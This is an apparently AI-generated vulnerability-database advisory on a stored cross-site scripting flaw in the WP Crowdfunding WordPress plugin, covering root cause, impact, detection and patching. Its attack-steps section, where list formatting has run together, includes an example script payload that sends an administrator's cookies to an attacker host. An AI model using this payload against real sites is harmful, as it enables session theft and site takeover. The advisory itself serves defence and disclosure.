
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-19945 is a Stored Cross-Site Scripting (XSS) vulnerability in the WP Crowdfunding plugin for WordPress, affecting all versions up to and including 2.2.1. The flaw exists in the first_name parameter due to insufficient input sanitization and output escaping, allowing authenticated attackers with subscriber-level access or above to inject persistent malicious scripts. When an administrator views an affected user's profile via the ?show_user_id= parameter, the stored payload executes in the admin's browser session, enabling cross-privilege script execution. It was published on September 9, 2026, with a CVSS v3.1 base score of 6.4 (Medium) (GitHub Advisory, Wordfence).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting). The root cause is the failure to sanitize user-supplied input in the first_name field before storing it in the database and the failure to escape it on output when rendering user profiles. Specifically, the vulnerable code paths are identified in includes/woocommerce/Actions.php (lines 79 and 116) and includes/woocommerce/dashboard/profile.php (line 62) of version 2.2.1 (GitHub Advisory, Wordfence). The attack vector is network-based, requires low privileges (subscriber account), and no user interaction beyond an administrator naturally viewing a user profile page.
Successful exploitation allows an authenticated attacker with minimal privileges (subscriber-level) to inject arbitrary JavaScript that persists in the database and executes in the browser of any user who views the affected profile — most critically, site administrators. This enables the attacker to perform privileged actions within the administrator's session, such as creating rogue admin accounts, modifying site settings, installing malicious plugins, or exfiltrating sensitive data, effectively leading to full site compromise (GitHub Advisory, Wordfence).
As of the disclosure date (September 9, 2026), there is no public proof-of-concept exploit code and no evidence of active in-the-wild exploitation (GitHub Advisory). The EPSS score is 0.0, indicating a currently low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. However, the low barrier to exploitation — requiring only a subscriber-level account — makes it a realistic threat on sites with open user registration (Wordfence).
first_name field with a malicious JavaScript payload, such as <script>fetch('https://attacker.com/steal?c='+document.cookie)</script>, via the plugin's profile update functionality (handled in Actions.php).?show_user_id=<attacker_id> URL parameter in the WordPress admin dashboard.profile.php), executing the JavaScript within the admin's authenticated session.<script>, <script>, javascript:) in the first_name field of WordPress user meta records in the wp_usermeta table./wp-admin/admin-ajax.php or WooCommerce account endpoints) from low-privilege user accounts containing suspicious payloads in form data.?show_user_id=<id> parameters followed by unusual subsequent admin actions (e.g., new admin user creation, plugin installation) not initiated by the legitimate administrator.The primary remediation is to update the WP Crowdfunding plugin to a version newer than 2.2.1 that includes proper input sanitization and output escaping for the first_name parameter; the patch changeset is available in the WordPress plugin repository (GitHub Advisory). As interim workarounds, site administrators should disable open user registration if not required, restrict plugin access to trusted users only, and implement a Content Security Policy (CSP) header to limit unauthorized script execution. Administrators should also audit existing user profiles for suspicious content in the first_name field and monitor admin sessions for anomalous activity (Wordfence).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."